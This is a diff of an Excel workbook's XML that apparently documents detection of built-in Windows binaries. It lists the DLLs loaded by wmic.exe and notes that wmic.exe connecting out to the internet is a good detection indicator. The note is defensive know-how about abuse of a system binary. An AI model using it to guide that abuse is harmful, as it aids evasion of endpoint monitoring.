+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Security Support Provider Interface - C:\Windows\System32\secur32.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+Win32 LDAP API DLL - C:\Windows\System32\Wldap32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="9"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Windows Setup API - C:\Windows\System32\setupapi.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Wmic.exe additional loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Application Compatibility Client Library - C:\Windows\System32\apphelp.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.9600.18006_none_623f33d3ecbe86e8\comctl32.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Internet Extensions for Win32 - C:\Windows\System32\wininet.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">MSCTF Server DLL - C:\Windows\System32\msctf.dll
+MSXML 3.0 - C:\Windows\System32\msxml3.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Security Support Provider Interface - C:\Windows\System32\secur32.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Win32 LDAP API DLL - C:\Windows\System32\Wldap32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="8"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Windows Setup API - C:\Windows\System32\setupapi.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+      </rPr>
+      <t>Endpoint:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve"> Best detection via commandline and process chains
+wmic.exe connecting out to the internet is a good indicator.
+Wmic.exe also loads wininet.dll and winhttp.dll across all versions I tested.</t>
     </r>
   </si>
 </sst>
@@ -9316,7 +9905,7 @@
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
 <styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" mc:Ignorable="x14ac x16r2">
-  <fonts count="34">
+  <fonts count="39">
     <font>
       <sz val="12"/>
       <color theme="1"/>
@@ -9557,6 +10146,35 @@
       <name val="Calibri"/>
       <family val="2"/>
       <scheme val="minor"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="12"/>
+      <color theme="1"/>
+      <name val="Calibri"/>
+      <family val="2"/>
+    </font>
+    <font>
+      <sz val="8"/>
+      <color theme="1"/>
+      <name val="Calibri (Body)_x0000_"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="8"/>
+      <color theme="1"/>
+      <name val="Calibri (Body)_x0000_"/>
+    </font>
+    <font>
+      <sz val="9"/>
+      <color theme="1"/>
+      <name val="Calibri (Body)_x0000_"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="9"/>
+      <color theme="1"/>
+      <name val="Calibri (Body)_x0000_"/>
     </font>
   </fonts>
   <fills count="35">
@@ -10465,7 +11083,7 @@
     </row>
     <row r="2" spans="1:1" ht="104">
       <c r="A2" s="4" t="s">
-        <v>209</v>
+        <v>208</v>
       </c>
     </row>
     <row r="3" spans="1:1" ht="200">
@@ -10618,10 +11236,10 @@
         <v>167</v>
       </c>
       <c r="C7" s="7" t="s">
-        <v>207</v>
+        <v>206</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>201</v>
+        <v>200</v>
       </c>
     </row>
     <row r="8" spans="1:10" ht="32">
@@ -10769,7 +11387,7 @@
         <v>169</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>202</v>
+        <v>201</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
@@ -10917,10 +11535,10 @@
         <v>172</v>
       </c>
       <c r="C7" s="36" t="s">
-        <v>206</v>
+        <v>205</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>203</v>
+        <v>202</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="288">
@@ -11067,10 +11685,10 @@
         <v>170</v>
       </c>
       <c r="C7" s="27" t="s">
-        <v>205</v>
+        <v>204</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>204</v>
+        <v>203</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="48">
@@ -11215,7 +11833,7 @@
         <v>176</v>
       </c>
       <c r="C7" s="47" t="s">
-        <v>210</v>
+        <v>209</v>
       </c>
       <c r="D7" s="45" t="s">
         <v>47</v>
@@ -11367,7 +11985,7 @@
         <v>177</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>211</v>
+        <v>210</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="32">
@@ -11409,9 +12027,9 @@
   <sheetPr codeName="Sheet12"/>
   <dimension ref="A1:D9"/>
   <sheetViews>
-    <sheetView topLeftCell="A4" zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
+    <sheetView zoomScale="80" zoomScaleNormal="80" workbookViewId="0">
       <pane xSplit="1" topLeftCell="C1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="D7" sqref="D7"/>
+      <selection pane="topRight" activeCell="D3" sqref="D3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -11518,7 +12136,7 @@
         <v>135</v>
       </c>
       <c r="D7" s="27" t="s">
-        <v>212</v>
+        <v>211</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="162">
@@ -11559,9 +12177,9 @@
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:D9"/>
   <sheetViews>
-    <sheetView topLeftCell="A4" workbookViewId="0">
+    <sheetView workbookViewId="0">
       <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="A9" sqref="A9"/>
+      <selection pane="topRight" activeCell="B7" sqref="B7"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -11605,10 +12223,10 @@
         <v>2</v>
       </c>
       <c r="B3" s="47" t="s">
-        <v>34</v>
+        <v>227</v>
       </c>
       <c r="C3" s="47" t="s">
-        <v>34</v>
+        <v>227</v>
       </c>
       <c r="D3" s="42" t="s">
         <v>89</v>
@@ -11661,13 +12279,13 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>182</v>
+        <v>238</v>
       </c>
       <c r="C7" s="47" t="s">
         <v>129</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>213</v>
+        <v>212</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="80">
@@ -11675,7 +12293,7 @@
         <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
-        <v>183</v>
+        <v>182</v>
       </c>
       <c r="C8" s="43" t="s">
         <v>130</v>
@@ -11706,10 +12324,162 @@
 
 <file path=xl/worksheets/sheet18.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+  <dimension ref="A1:E9"/>
+  <sheetViews>
+    <sheetView topLeftCell="A2" workbookViewId="0">
+      <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
+      <selection pane="topRight"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
+  <cols>
+    <col min="1" max="1" width="25.33203125" customWidth="1"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="153.6640625" customWidth="1"/>
+    <col min="4" max="4" width="164.1640625" bestFit="1" customWidth="1"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:5">
+      <c r="A1" s="12" t="s">
+        <v>18</v>
+      </c>
+      <c r="B1" s="9" t="s">
+        <v>138</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>98</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>44</v>
+      </c>
+    </row>
+    <row r="2" spans="1:5" ht="48">
+      <c r="A2" s="13" t="s">
+        <v>5</v>
+      </c>
+      <c r="B2" s="43" t="s">
+        <v>225</v>
+      </c>
+      <c r="C2" s="43" t="s">
+        <v>225</v>
+      </c>
+      <c r="D2" s="43" t="s">
+        <v>225</v>
+      </c>
+    </row>
+    <row r="3" spans="1:5" ht="20" customHeight="1">
+      <c r="A3" s="14" t="s">
+        <v>2</v>
+      </c>
+      <c r="B3" s="47" t="s">
+        <v>234</v>
+      </c>
+      <c r="C3" s="47" t="s">
+        <v>226</v>
+      </c>
+      <c r="D3" s="42" t="s">
+        <v>89</v>
+      </c>
+    </row>
+    <row r="4" spans="1:5" ht="48">
+      <c r="A4" s="14" t="s">
+        <v>101</v>
+      </c>
+      <c r="B4" s="10" t="s">
+        <v>174</v>
+      </c>
+      <c r="C4" s="10" t="s">
+        <v>19</v>
+      </c>
+      <c r="D4" s="10" t="s">
+        <v>51</v>
+      </c>
+    </row>
+    <row r="5" spans="1:5" s="9" customFormat="1">
+      <c r="A5" s="13" t="s">
+        <v>73</v>
+      </c>
+      <c r="B5" s="7" t="s">
+        <v>228</v>
+      </c>
+      <c r="C5" s="7" t="s">
+        <v>228</v>
+      </c>
+      <c r="D5" s="7" t="s">
+        <v>228</v>
+      </c>
+    </row>
+    <row r="6" spans="1:5" ht="112">
+      <c r="A6" s="13" t="s">
+        <v>7</v>
+      </c>
+      <c r="B6" s="43" t="s">
+        <v>230</v>
+      </c>
+      <c r="C6" s="43" t="s">
+        <v>230</v>
+      </c>
+      <c r="D6" s="43" t="s">
+        <v>230</v>
+      </c>
+    </row>
+    <row r="7" spans="1:5" ht="409" customHeight="1">
+      <c r="A7" s="13" t="s">
+        <v>8</v>
+      </c>
+      <c r="B7" s="47" t="s">
+        <v>239</v>
+      </c>
+      <c r="C7" s="47" t="s">
+        <v>240</v>
+      </c>
+      <c r="D7" s="36" t="s">
+        <v>241</v>
+      </c>
+      <c r="E7" t="s">
+        <v>231</v>
+      </c>
+    </row>
+    <row r="8" spans="1:5" ht="80">
+      <c r="A8" s="13" t="s">
+        <v>66</v>
+      </c>
+      <c r="B8" s="43" t="s">
+        <v>232</v>
+      </c>
+      <c r="C8" s="43" t="s">
+        <v>229</v>
+      </c>
+      <c r="D8" s="43" t="s">
+        <v>233</v>
+      </c>
+    </row>
+    <row r="9" spans="1:5">
+      <c r="A9" s="13" t="s">
+        <v>67</v>
+      </c>
+      <c r="B9" s="7" t="s">
+        <v>132</v>
+      </c>
+      <c r="C9" s="7" t="s">
+        <v>132</v>
+      </c>
+      <c r="D9" s="7" t="s">
+        <v>132</v>
+      </c>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
+</worksheet>
+</file>
+
+<file path=xl/worksheets/sheet19.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
   <dimension ref="A1:D9"/>
   <sheetViews>
-    <sheetView topLeftCell="A7" workbookViewId="0">
-      <pane xSplit="1" topLeftCell="C1" activePane="topRight" state="frozen"/>
+    <sheetView topLeftCell="A6" workbookViewId="0">
+      <pane xSplit="1" topLeftCell="D1" activePane="topRight" state="frozen"/>
       <selection pane="topRight" activeCell="D8" sqref="D8"/>
     </sheetView>
   </sheetViews>
@@ -11810,13 +12580,13 @@
         <v>8</v>
       </c>
       <c r="B7" s="4" t="s">
-        <v>184</v>
+        <v>183</v>
       </c>
       <c r="C7" s="47" t="s">
         <v>127</v>
       </c>
       <c r="D7" s="36" t="s">
-        <v>214</v>
+        <v>213</v>
       </c>
     </row>
     <row r="8" spans="1:4" ht="112">
@@ -11824,7 +12594,7 @@
         <v>66</v>
       </c>
       <c r="B8" s="43" t="s">
-        <v>185</v>
+        <v>184</v>
       </c>
       <c r="C8" s="43" t="s">
         <v>128</v>
@@ -11845,156 +12615,6 @@
       </c>
       <c r="D9" s="43" t="s">
         <v>63</v>
-      </c>
-    </row>
-  </sheetData>
-  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
-  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
-</worksheet>
-</file>
-
-<file path=xl/worksheets/sheet19.xml><?xml version="1.0" encoding="utf-8"?>
-<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:D9"/>
-  <sheetViews>
-    <sheetView workbookViewId="0">
-      <pane xSplit="1" topLeftCell="C1" activePane="topRight" state="frozen"/>
-      <selection pane="topRight" activeCell="C19" sqref="C19"/>
-    </sheetView>
-  </sheetViews>
-  <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
-  <cols>
-    <col min="1" max="1" width="25.33203125" style="2" customWidth="1"/>
-    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
-    <col min="3" max="3" width="153.6640625" style="2" customWidth="1"/>
-    <col min="4" max="4" width="120" style="2" customWidth="1"/>
-    <col min="5" max="16384" width="10.83203125" style="2"/>
-  </cols>
-  <sheetData>
-    <row r="1" spans="1:4">
-      <c r="A1" s="40" t="s">
-        <v>18</v>
-      </c>
-      <c r="B1" s="25" t="s">
-        <v>138</v>
-      </c>
-      <c r="C1" s="18" t="s">
-        <v>98</v>
-      </c>
-      <c r="D1" s="25" t="s">
-        <v>44</v>
-      </c>
-    </row>
-    <row r="2" spans="1:4" ht="128">
-      <c r="A2" s="40" t="s">
-        <v>5</v>
-      </c>
-      <c r="B2" s="47" t="s">
-        <v>43</v>
-      </c>
-      <c r="C2" s="47" t="s">
-        <v>43</v>
-      </c>
-      <c r="D2" s="47" t="s">
-        <v>43</v>
-      </c>
-    </row>
-    <row r="3" spans="1:4" ht="20" customHeight="1">
-      <c r="A3" s="41" t="s">
-        <v>2</v>
-      </c>
-      <c r="B3" s="47" t="s">
-        <v>40</v>
-      </c>
-      <c r="C3" s="47" t="s">
-        <v>40</v>
-      </c>
-      <c r="D3" s="47" t="s">
-        <v>40</v>
-      </c>
-    </row>
-    <row r="4" spans="1:4">
-      <c r="A4" s="41" t="s">
-        <v>16</v>
-      </c>
-      <c r="B4" s="47" t="s">
-        <v>40</v>
-      </c>
-      <c r="C4" s="47" t="s">
-        <v>40</v>
-      </c>
-      <c r="D4" s="47" t="s">
-        <v>40</v>
-      </c>
-    </row>
-    <row r="5" spans="1:4" s="9" customFormat="1">
-      <c r="A5" s="13" t="s">
-        <v>73</v>
-      </c>
-      <c r="B5" s="7" t="s">
-        <v>81</v>
-      </c>
-      <c r="C5" s="7" t="s">
-        <v>81</v>
-      </c>
-      <c r="D5" s="7" t="s">
-        <v>81</v>
-      </c>
-    </row>
-    <row r="6" spans="1:4" ht="64">
-      <c r="A6" s="40" t="s">
-        <v>7</v>
-      </c>
-      <c r="B6" s="47" t="s">
-        <v>41</v>
-      </c>
-      <c r="C6" s="47" t="s">
-        <v>41</v>
-      </c>
-      <c r="D6" s="47" t="s">
-        <v>41</v>
-      </c>
-    </row>
-    <row r="7" spans="1:4">
-      <c r="A7" s="40" t="s">
-        <v>8</v>
-      </c>
-      <c r="B7" s="47" t="s">
-        <v>42</v>
-      </c>
-      <c r="C7" s="47" t="s">
-        <v>42</v>
-      </c>
-      <c r="D7" s="47" t="s">
-        <v>42</v>
-      </c>
-    </row>
-    <row r="8" spans="1:4">
-      <c r="A8" s="13" t="s">
-        <v>66</v>
-      </c>
-      <c r="B8" s="48" t="s">
-        <v>0</v>
-      </c>
-      <c r="C8" s="48" t="s">
-        <v>0</v>
-      </c>
-      <c r="D8" s="48" t="s">
-        <v>0</v>
-      </c>
-    </row>
-    <row r="9" spans="1:4">
-      <c r="A9" s="13" t="s">
-        <v>67</v>
-      </c>
-      <c r="B9" s="47" t="s">
-        <v>36</v>
-      </c>
-      <c r="C9" s="47" t="s">
-        <v>36</v>
-      </c>
-      <c r="D9" s="47" t="s">
-        <v>36</v>
       </c>
     </row>
   </sheetData>
@@ -12005,11 +12625,11 @@
 
 <file path=xl/worksheets/sheet2.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <dimension ref="A1:M37"/>
+  <dimension ref="A1:M39"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
-      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
-      <selection pane="bottomLeft"/>
+      <pane ySplit="1" topLeftCell="A25" activePane="bottomLeft" state="frozen"/>
+      <selection pane="bottomLeft" activeCell="A32" sqref="A32"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -12069,7 +12689,7 @@
     </row>
     <row r="6" spans="1:13" ht="208">
       <c r="A6" s="26" t="s">
-        <v>227</v>
+        <v>224</v>
       </c>
       <c r="B6" s="17" t="s">
         <v>161</v>
@@ -12082,7 +12702,7 @@
     </row>
     <row r="8" spans="1:13" ht="192">
       <c r="A8" s="26" t="s">
-        <v>226</v>
+        <v>223</v>
       </c>
       <c r="B8" s="17" t="s">
         <v>160</v>
@@ -12095,7 +12715,7 @@
     </row>
     <row r="10" spans="1:13" ht="144">
       <c r="A10" s="26" t="s">
-        <v>225</v>
+        <v>222</v>
       </c>
       <c r="B10" s="17" t="s">
         <v>162</v>
@@ -12108,7 +12728,7 @@
     </row>
     <row r="12" spans="1:13" ht="112">
       <c r="A12" s="26" t="s">
-        <v>224</v>
+        <v>221</v>
       </c>
       <c r="B12" s="17" t="s">
         <v>163</v>
@@ -12121,7 +12741,7 @@
     </row>
     <row r="14" spans="1:13" ht="112">
       <c r="A14" s="10" t="s">
-        <v>223</v>
+        <v>220</v>
       </c>
       <c r="B14" s="17" t="s">
         <v>163</v>
@@ -12157,7 +12777,7 @@
     </row>
     <row r="20" spans="1:2" ht="208">
       <c r="A20" s="46" t="s">
-        <v>216</v>
+        <v>215</v>
       </c>
       <c r="B20" s="6" t="s">
         <v>121</v>
@@ -12169,7 +12789,7 @@
     </row>
     <row r="22" spans="1:2" ht="409.6">
       <c r="A22" s="27" t="s">
-        <v>217</v>
+        <v>216</v>
       </c>
       <c r="B22" s="6" t="s">
         <v>122</v>
@@ -12181,7 +12801,7 @@
     </row>
     <row r="24" spans="1:2" ht="128">
       <c r="A24" s="35" t="s">
-        <v>218</v>
+        <v>217</v>
       </c>
       <c r="B24" s="17" t="s">
         <v>137</v>
@@ -12193,7 +12813,7 @@
     </row>
     <row r="26" spans="1:2" ht="112">
       <c r="A26" s="36" t="s">
-        <v>219</v>
+        <v>218</v>
       </c>
       <c r="B26" s="36" t="s">
         <v>124</v>
@@ -12205,7 +12825,7 @@
     </row>
     <row r="28" spans="1:2" ht="96">
       <c r="A28" s="36" t="s">
-        <v>220</v>
+        <v>235</v>
       </c>
       <c r="B28" s="36" t="s">
         <v>125</v>
@@ -12217,7 +12837,7 @@
     </row>
     <row r="30" spans="1:2" ht="48">
       <c r="A30" s="36" t="s">
-        <v>221</v>
+        <v>236</v>
       </c>
       <c r="B30" s="36" t="s">
         <v>93</v>
@@ -12227,41 +12847,203 @@
       <c r="A31" s="37"/>
       <c r="B31" s="38"/>
     </row>
-    <row r="32" spans="1:2" ht="144">
+    <row r="32" spans="1:2" ht="48">
       <c r="A32" s="36" t="s">
-        <v>222</v>
-      </c>
-      <c r="B32" s="31" t="s">
-        <v>126</v>
+        <v>237</v>
+      </c>
+      <c r="B32" s="36" t="s">
+        <v>242</v>
       </c>
     </row>
     <row r="33" spans="1:2" ht="7" customHeight="1">
       <c r="A33" s="37"/>
       <c r="B33" s="38"/>
     </row>
-    <row r="34" spans="1:2" ht="128">
+    <row r="34" spans="1:2" ht="144">
       <c r="A34" s="36" t="s">
-        <v>60</v>
-      </c>
-      <c r="B34" s="36" t="s">
-        <v>94</v>
+        <v>219</v>
+      </c>
+      <c r="B34" s="31" t="s">
+        <v>126</v>
       </c>
     </row>
     <row r="35" spans="1:2" ht="7" customHeight="1">
       <c r="A35" s="37"/>
       <c r="B35" s="38"/>
     </row>
-    <row r="36" spans="1:2" ht="48">
-      <c r="A36" s="51" t="s">
-        <v>92</v>
-      </c>
-      <c r="B36" s="52" t="s">
-        <v>91</v>
+    <row r="36" spans="1:2" ht="128">
+      <c r="A36" s="36" t="s">
+        <v>60</v>
+      </c>
+      <c r="B36" s="36" t="s">
+        <v>94</v>
       </c>
     </row>
     <row r="37" spans="1:2" ht="7" customHeight="1">
       <c r="A37" s="37"/>
       <c r="B37" s="38"/>
+    </row>
+    <row r="38" spans="1:2" ht="48">
+      <c r="A38" s="51" t="s">
+        <v>92</v>
+      </c>
+      <c r="B38" s="52" t="s">
+        <v>91</v>
+      </c>
+    </row>
+    <row r="39" spans="1:2" ht="7" customHeight="1">
+      <c r="A39" s="37"/>
+      <c r="B39" s="38"/>
+    </row>
+  </sheetData>
+  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
+  <pageSetup paperSize="9" orientation="portrait" horizontalDpi="0" verticalDpi="0"/>
+</worksheet>
+</file>
+
+<file path=xl/worksheets/sheet20.xml><?xml version="1.0" encoding="utf-8"?>
+<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
+  <dimension ref="A1:D9"/>
+  <sheetViews>
+    <sheetView workbookViewId="0">
+      <pane xSplit="1" topLeftCell="C1" activePane="topRight" state="frozen"/>
+      <selection pane="topRight" activeCell="C19" sqref="C19"/>
+    </sheetView>
+  </sheetViews>
+  <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
+  <cols>
+    <col min="1" max="1" width="25.33203125" style="2" customWidth="1"/>
+    <col min="2" max="2" width="133.1640625" style="9" customWidth="1"/>
+    <col min="3" max="3" width="153.6640625" style="2" customWidth="1"/>
+    <col min="4" max="4" width="120" style="2" customWidth="1"/>
+    <col min="5" max="16384" width="10.83203125" style="2"/>
+  </cols>
+  <sheetData>
+    <row r="1" spans="1:4">
+      <c r="A1" s="40" t="s">
+        <v>18</v>
+      </c>
+      <c r="B1" s="25" t="s">
+        <v>138</v>
+      </c>
+      <c r="C1" s="18" t="s">
+        <v>98</v>
+      </c>
+      <c r="D1" s="25" t="s">
+        <v>44</v>
